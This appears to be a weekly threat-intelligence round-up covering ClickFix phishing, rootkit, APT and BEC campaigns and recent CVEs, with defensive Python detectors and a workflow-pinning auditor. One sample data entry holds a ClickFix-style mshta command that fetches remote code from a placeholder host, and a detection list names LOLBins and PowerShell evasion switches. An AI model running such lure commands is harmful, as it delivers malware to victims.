Weekly Cyber Round-up

Intelligence Report

March 20, 2025

Phishing campaign impersonates Booking[.]com to deliver infostealers via ClickFix technique

Microsoft researchers identified a phishing campaign, attributed to Storm-1865 and active since December 2024, that delivers a range of infostealers and remote access trojans via emails impersonating the online travel agency Booking.com. The campaign uses the ClickFix technique to deliver its payloads, which include XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. It specifically targets hospitality organisations in North America, Oceania, South and Southeast Asia, and Europe that are likely to work with Booking.com. The initial infection vector is an email that appears to come from Booking.com and contains either a link or a PDF attachment containing a link. Clicking the link redirects the user to a webpage displaying a fake CAPTCHA, which instructs them to press a keyboard shortcut to open the Windows Run dialog, then paste and execute a command that downloads and runs the malicious payload. Because the victim, rather than an exploit or a macro, launches the command, the technique sidesteps controls that only inspect attachments or block document macros.


OBSCURE#BAT social engineering campaign delivers r77 rootkit

Securonix researchers analysed an ongoing social engineering campaign, dubbed OBSCURE#BAT, that tricks users into executing a heavily obfuscated batch script which ultimately installs the r77 user-mode rootkit. The campaign primarily targets English-speaking individuals, with attacker infrastructure pointing to the United States and victim telemetry from Canada, Germany, and the United Kingdom. Once installed, r77 hides the attacker's processes, files and registry keys, monitors the clipboard and command history, and saves the captured data to hidden files for exfiltration. The initial lure is either a fake download of legitimate software or a fake CAPTCHA page using the ClickFix technique. When the user follows the instructions, a ZIP file is downloaded that contains legitimate files alongside the malicious batch file.
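Both the Storm-1865 and OBSCURE#BAT lures end the same way: the victim pastes a command into the Windows Run dialog. That leaves two artefacts a responder can hunt for: the RunMRU registry key, which records what was typed into Run, and a process-creation event whose parent is explorer.exe (the Run dialog's host). The Python script below is an added example written for this round-up, not code from Microsoft, Securonix or any vendor; the indicator patterns, the log record format and the sample data are constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass, field

# Heuristics for ClickFix-style one-liners: a LOLBin that fetches remote content,
# often padded with "I am not a robot" text so only the lure is visible in the Run
# box. These patterns and the sample data are my own assumptions for this
# example, not indicators taken from the Microsoft or Securonix reports.
LOLBIN_RE = re.compile(
    r"\b(mshta|powershell|pwsh|curl|bitsadmin|certutil|rundll32|msiexec|wscript|cscript)(\.exe)?\b",
    re.I,
)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
EVASION_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|\biex\b|invoke-expression|downloadstring|frombase64string)",
    re.I,
)
LURE_RE = re.compile(r"(not a robot|verification|captcha|verify you are human)", re.I)


@dataclass
class Finding:
    source: str
    command: str
    reasons: list = field(default_factory=list)


def score_command(cmd: str) -> list[str]:
    """Return the ClickFix indicators present in a Run-dialog or shell command line."""
    reasons = []
    if LOLBIN_RE.search(cmd):
        reasons.append("lolbin")
    if URL_RE.search(cmd):
        reasons.append("remote_url")
    if EVASION_RE.search(cmd):
        reasons.append("evasion_switch")
    if LURE_RE.search(cmd):
        reasons.append("captcha_lure_text")
    return reasons


def runmru_commands(values: dict) -> list[str]:
    """Extract commands from an exported RunMRU key.

    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU stores each
    Run-dialog entry as a value whose data is the command followed by '\\1';
    the MRUList value only records ordering and carries no command.
    """
    out = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        out.append(data[:-2] if data.endswith("\\1") else data)
    return out


def parse_proc_event(line: str) -> dict:
    """Parse a constructed 'Key=Value|Key=Value' process-creation record."""
    return dict(part.split("=", 1) for part in line.split("|") if "=" in part)


def hunt(runmru: dict, proc_events: list[str], min_indicators: int = 2) -> list[Finding]:
    """Flag RunMRU entries and explorer.exe-spawned processes with enough indicators."""
    findings = []
    for cmd in runmru_commands(runmru):
        reasons = score_command(cmd)
        if len(reasons) >= min_indicators:
            findings.append(Finding("RunMRU", cmd, reasons))
    for line in proc_events:
        ev = parse_proc_event(line)
        # The Run dialog launches its child from explorer.exe, so a LOLBin with that
        # parent is a strong sign the command was typed or pasted by the user.
        if not ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
            continue
        reasons = score_command(ev.get("CommandLine", ""))
        if len(reasons) >= min_indicators:
            findings.append(Finding("ProcessCreate", ev["CommandLine"], reasons + ["parent_explorer"]))
    return findings


# Constructed sample data (not real artefacts from any incident).
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": "mshta https://example.invalid/verify # I am not a robot - reCAPTCHA Verification ID: 7811\\1",
}
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta https://example.invalid/verify # I am not a robot - reCAPTCHA Verification ID: 7811",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad",
    "ParentImage=C:\\Program Files\\Git\\git-bash.exe|Image=C:\\Windows\\System32\\curl.exe|CommandLine=curl https://example.invalid/file.zip -o f.zip",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_RUNMRU, SAMPLE_EVENTS):
        print(f.source, f.reasons, f.command[:70])
```

The third sample event (curl launched from a Git Bash shell) is deliberately not flagged: the parent filter is what separates a developer fetching a file from a user pasting a lure into Run, so tune that filter rather than the indicator list first if you see false positives.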

MirrorFace APT’s Operation AkaiRyū leverages custom AsyncRAT variant and ANEL backdoor

ESET researchers detailed Operation AkaiRyū, an espionage campaign by the advanced persistent threat (APT) actor MirrorFace. The campaign was first detected in Q2 and Q3 2024 and targeted a Japanese research institute and a Central European diplomatic institute using a World Expo 2025 lure, marking the first time MirrorFace has been observed targeting a European entity. MirrorFace introduced new tools and techniques in this campaign, including a customised version of AsyncRAT and the ANEL backdoor. Initial access was achieved through multiple spear phishing campaigns that tricked users into opening malicious attachments or links. The campaign also abused legitimate McAfee and JustSystems applications to sideload the ANEL backdoor.

Phishing campaign exploits Microsoft 365 infrastructure for BEC attacks

Guardz researchers discovered a phishing campaign that abuses Microsoft 365's own infrastructure for credential harvesting and account takeover. The campaign uses legitimate Microsoft domains and tenant misconfigurations to conduct business email compromise (BEC) attacks, and relies on Microsoft service-generated emails, so the messages originate from Microsoft's own infrastructure, evade filters that trust that infrastructure, and carry lures that appear authentic. The attack chain has six phases and begins with the threat actor registering or taking control of multiple Microsoft tenants, which are used for unauthorised purchases, brand impersonation, and as a relay point. In the final phase the attackers engage the victim through a fake support number embedded in the phishing email.
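The practical problem with this campaign is that sender reputation and SPF/DKIM/DMARC all say "genuine Microsoft", so detection has to fall back on content: a service notification that carries an unfamiliar phone number plus pressure to call is the tell. The script below is an added example, not Guardz's detection logic or any Microsoft product feature; the trusted sender domains, the "known good" support number, the keyword lists and the three sample messages are constructed assumptions for illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Heuristic for callback phishing relayed through a legitimate service email.
# Domains, keywords, numbers and messages below are my own assumptions for this
# example, not indicators from the Guardz report.
TRUSTED_SERVICE_DOMAINS = {"microsoft.com", "email.microsoft.com"}
KNOWN_SUPPORT_NUMBERS = {"1-800-555-0100"}  # assumption: numbers verified out of band
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
URGENCY_RE = re.compile(
    r"\b(call|contact|phone)\b[^.\n]{0,60}\b(immediately|within \d+ hours?|to cancel|to dispute|refund|unauthori[sz]ed)\b",
    re.I,
)


def normalise_phone(raw: str) -> str:
    """Reduce any North American formatting to 1-NNN-NNN-NNNN for set comparison."""
    digits = re.sub(r"\D", "", raw)
    if len(digits) == 11 and digits.startswith("1"):
        digits = digits[1:]
    return f"1-{digits[:3]}-{digits[3:6]}-{digits[6:]}" if len(digits) == 10 else digits


def auth_results(msg) -> dict:
    """Read pass/fail for spf, dkim and dmarc from Authentication-Results headers."""
    ar = " ".join(msg.get_all("Authentication-Results", [])).lower()
    return {mech: f"{mech}=pass" in ar for mech in ("spf", "dkim", "dmarc")}


def assess(raw_message: str) -> dict:
    """Classify a plain-text message; the key case is an authenticated message
    from a trusted service that still contains an unknown callback number."""
    msg = message_from_string(raw_message)
    _, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    body = msg.get_payload()
    auth = auth_results(msg)
    phones = {normalise_phone(p) for p in PHONE_RE.findall(body)}
    unknown = sorted(phones - KNOWN_SUPPORT_NUMBERS)
    urgency = bool(URGENCY_RE.search(body))
    trusted = domain in TRUSTED_SERVICE_DOMAINS and all(auth.values())
    if trusted and unknown and urgency:
        verdict = "callback_phish_via_trusted_service"
    elif unknown and urgency:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"from_domain": domain, "authenticated": trusted,
            "unknown_numbers": unknown, "urgency": urgency, "verdict": verdict}


# Constructed messages. The "Organization:" line stands in for the attacker-controlled
# tenant name that the service notification echoes back; its format is an assumption.
PASS_AR = "Authentication-Results: spf=pass smtp.mailfrom=microsoft.com; dkim=pass header.d=microsoft.com; dmarc=pass header.from=microsoft.com"
SAMPLE_PHISH = "\n".join([
    "From: Microsoft <microsoft-noreply@microsoft.com>",
    "To: finance@victim.example",
    "Subject: Your Microsoft 365 order confirmation",
    PASS_AR,
    "",
    "Thank you for your purchase.",
    "Organization: Your account was charged $689.99. Call (888) 555-0142 immediately to cancel or dispute this charge.",
    "Order total: $689.99",
])
SAMPLE_LEGIT = "\n".join([
    "From: Microsoft <microsoft-noreply@microsoft.com>",
    "To: finance@victim.example",
    "Subject: Your Microsoft 365 order confirmation",
    PASS_AR,
    "",
    "Thank you for your purchase.",
    "Order total: $12.99",
    "Questions? Call 1-800-555-0100.",
])
SAMPLE_UNAUTH = SAMPLE_PHISH.replace(
    "From: Microsoft <microsoft-noreply@microsoft.com>", "From: Billing <billing@contoso-support.example>"
).replace(PASS_AR, "Authentication-Results: spf=fail smtp.mailfrom=contoso-support.example; dkim=none; dmarc=fail")

if __name__ == "__main__":
    for name, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT), ("unauth", SAMPLE_UNAUTH)):
        print(name, assess(sample)["verdict"])
```

Note that the unauthenticated copy of the same lure is only rated "suspicious": the point of the stronger verdict is that a message which passes every authentication check and still asks you to dial a number you have never verified deserves more scrutiny, not less.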

Phishing campaign uses health concerns and products as lures to steal payment details

JUMPSEC researchers observed a multi-stage phishing campaign that used health-related concerns as lures to steal payment information. The phishing emails claimed to offer health products and contained links that redirected victims to a 'Human Verification Check' page. Upon completing the verification step, victims were redirected to a shopping website designed to mimic a legitimate online store. Victims who attempted to add products to their cart were redirected to a payment page hosted on the ClickBank marketplace, where they were deceived into entering their payment details under the guise of a legitimate purchase. The researchers identified multiple other phishing emails that followed the same attack chain and originated from the same phishing domains.

High Priority Vulnerabilities

Name              Software            Base Score  Temporal Score
CVE-2025-30066    changed-files       8.6         5.3
  Related: Supply Chain Compromise of Third-Party GitHub Action, CVE-2025-30066
CVE-2025-24813    Tomcat              5.6         5.4
  Related: Actively exploited remote code execution flaw patched in Apache Tomcat
CVE-2024-27564    ChatGPT             6.5         6.1
  Related: OpenAI Under Attack: CVE-2024-27564 Actively Exploited in the Wild
CVE-2024-55591    FortiProxy          9.8         9.8
  Related: New Mora_001 gang exploits Fortinet firewall flaws to deploy SuperBlack ransomware
CVE-2017-12637    NetWeaver AS JAVA   7.5         6.4
  Related: NAKIVO, SAP, and Edimax flaws under active exploitation
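The changed-files entry is a supply chain case rather than a bug in the action's code: git tags are mutable, and the existing version tags on the action were repointed to a malicious commit, so every workflow that referenced a tag picked up the new code on its next run. Pinning to a full 40-character commit SHA is the standard control. The script below, an added example and not code from the advisory or from the tj-actions project, audits workflow text for references that are not pinned to an immutable SHA. The sample workflow and the 40-character placeholder SHA are constructed and do not correspond to any real commit.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Audit GitHub Actions workflow text for mutable action references. The sample
# workflow and placeholder SHA are constructed for this example.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")
VERSION_TAG_RE = re.compile(r"^v?\d+(\.\d+){0,2}$")
MUTABLE_KINDS = {"version_tag", "branch_or_ref", "unpinned", "docker_tag"}


@dataclass
class ActionRef:
    target: str          # owner/repo[/path], local path, or docker image
    ref: Optional[str]   # text after '@', if any
    kind: str            # sha | version_tag | branch_or_ref | unpinned | local | docker_tag | docker_digest
    line: int


def classify(uses: str, line: int = 0) -> ActionRef:
    """Decide whether a single 'uses:' value is pinned to something immutable."""
    if uses.startswith("./"):
        return ActionRef(uses, None, "local", line)  # same repo, same commit as the workflow
    if uses.startswith("docker://"):
        image = uses[len("docker://"):]
        kind = "docker_digest" if "@sha256:" in image else "docker_tag"
        return ActionRef(image, None, kind, line)
    target, sep, ref = uses.partition("@")
    if not sep:
        return ActionRef(target, None, "unpinned", line)
    if FULL_SHA_RE.match(ref):
        kind = "sha"
    elif VERSION_TAG_RE.match(ref):
        kind = "version_tag"    # a tag can be moved by a maintainer or an attacker
    else:
        kind = "branch_or_ref"  # branches move on every push
    return ActionRef(target, ref, kind, line)


def audit_workflow(text: str) -> list[ActionRef]:
    """Return every action reference found in workflow YAML text with its line number."""
    refs = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if m:
            refs.append(classify(m.group(1), n))
    return refs


def mutable_refs(text: str) -> list[ActionRef]:
    """Only the references a reviewer should ask to have pinned."""
    return [r for r in audit_workflow(text) if r.kind in MUTABLE_KINDS]


# Constructed workflow: the weak and the corrected form of the same step side by side.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Changed files (mutable tag, weak)
        uses: tj-actions/changed-files@v45
      - name: Changed files (pinned to a placeholder SHA, corrected form)
        uses: tj-actions/changed-files@0123456789abcdef0123456789abcdef01234567 # v45
      - uses: ./.github/actions/lint
      - uses: docker://alpine:3.19
      - uses: some-org/some-action@main
      - uses: some-org/no-ref
"""

if __name__ == "__main__":
    for r in mutable_refs(SAMPLE_WORKFLOW):
        print(f"line {r.line}: {r.target}@{r.ref or ''} is {r.kind}; pin to a full commit SHA")
```

A SHA pin only helps if someone actually reviews the commit being pinned and bumps it deliberately; the trailing `# v45` comment is the usual convention for recording which release the SHA corresponds to.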
